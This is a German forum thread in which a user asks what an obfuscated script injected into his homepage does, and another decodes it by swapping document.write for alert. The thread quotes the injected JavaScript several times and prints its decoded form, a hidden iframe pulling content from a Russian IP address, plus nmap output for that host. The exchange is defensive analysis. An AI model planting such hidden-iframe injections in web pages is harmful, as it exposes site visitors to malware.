Script entschlüsseln

S

sandro76

0
Hallo,

auf eine Hompage wurde ein zusätzlicher Code hinzugefügt. Dieser wird von Kaspersky als Trojaner gemeldet. Der Code scheint aber verschlüsselt zu sein. Hat jemand eine ahnung was sich dahinter verbirgt?

Code: 
<body bgcolor="#000000" text="#000000"><script>function v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} document.write(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

Danke schon mal für die Hilfe

sandro
 
Hi,
einfach document.write mit einer sichtbaren ausgabe überschreiben. Für einen kurzen überblick reicht sogar "alert(...)"
Code: 
<body bgcolor="#000000" text="#000000"><script>function v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} alert(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
speichern als *.html und schon sieht man den code:

Code: 
<SCRIPT>
window.status='Done';document.write('<iframe name=a6819 src=\'http://77.221.133.150/.if/go.html?'+math.round(math.random()*285963+'e9ef\' width=479 height=597 style\'display: none\'></iframe>')
</SCRIPT>


EDIT:
Der holt sich also von hier: 'http://77.221.133.150/.if/go.html?" irgend was 1337 mässiges...
EDIT2:
nmap meint folgendes:
Interesting ports on 77.221.133.150.addr.datapoint.ru (77.221.133.150):
Not shown: 1713 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
Zum Vergrößern anklicken....

irgend ein russischer server. aber ausser http/ ftp/ssh läuft da nicht viel. Und bekommt der GET Request nicht die korrekte Syntax, landet man auf Google...

mfg
90nop
 
Hallo 90nop,

danke für die Antwort. Wie genau sah denn dein Quelltext aus mit Document.write? Habe evtl. öffter solche Fälle und keine Ahnung wie das funktioniert mit dem "Übersetzen".

Gruß
sandro
 
Die Ausgabe des entschlüsselten Codes erfolgt in deinem geposteten code mit document.write. etwa so:
Code: 
document.write(v4823a3b976d09('...ne menge zeichen...'))

Die Funktion
Code: 
v4823a3b976d09('...')
entschlüsselt uns also den code schon. Wir müssen ihn nun nur noch sichtbar machen:

Code: 
alert(v4823a3b976d09('...'))

..eben document.write durch alert ersetzten ;)
 
Irgendwie bin ich zu blond dafür...

ich bekomme da nur eine weiße Seite.

Code: 
<Script>
document.write(v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} document.write(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')))

alert(v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} document.write(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E')))
</Script>

Da schein ich was nicht verstanden zu haben, oder?

Gruß
Sandro
 
1. So, wie es am Ende aussehen sollte habe ich schon in meinem ersten Post gezeigt. (Erstes Code-Quote). Das must du nur noch kopieren, und als *,html speichern und dann starten.

2. K.a. wie du auf deinen obigen code kommst. Es gibt in deinem geposteten code (im Startposting) nur ein einziges "document.write(". Das ersetzt du durch "alert(" . Dann solltest du eben das hier erhalten:
Code: 
<body bgcolor="#000000" text="#000000"><script>function v4823a3b974d26(v4823a3b97551d){ function v4823a3b975d15 () {var v4823a3b97650f=16; return v4823a3b97650f;} return(parseInt(v4823a3b97551d,v4823a3b975d15()));}function v4823a3b976d09(v4823a3b977500){ function v4823a3b978cdc () {return 2;} var v4823a3b977cf8='';for(v4823a3b9784f9=0; v4823a3b9784f9<v4823a3b977500.length; v4823a3b9784f9+=v4823a3b978cdc()){ v4823a3b977cf8+=(String.fromCharCode(v4823a3b974d26(v4823a3b977500.substr(v4823a3b9784f9, v4823a3b978cdc()))));}return v4823a3b977cf8;} alert(v4823a3b976d09('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6136383139207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323835393633292B27653965665C272077696474683D343739206865696768743D353937207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
 
Ahhh,

jetzt hab sogar ich das verstanden. Mir war das vor lauter Code nicht aufgefallen das du document.write in allert getauscht hattest.
Prima, vielen dank

Gruß
sandro
 
Um antworten zu können musst du eingeloggt sein.
Zurück
Oben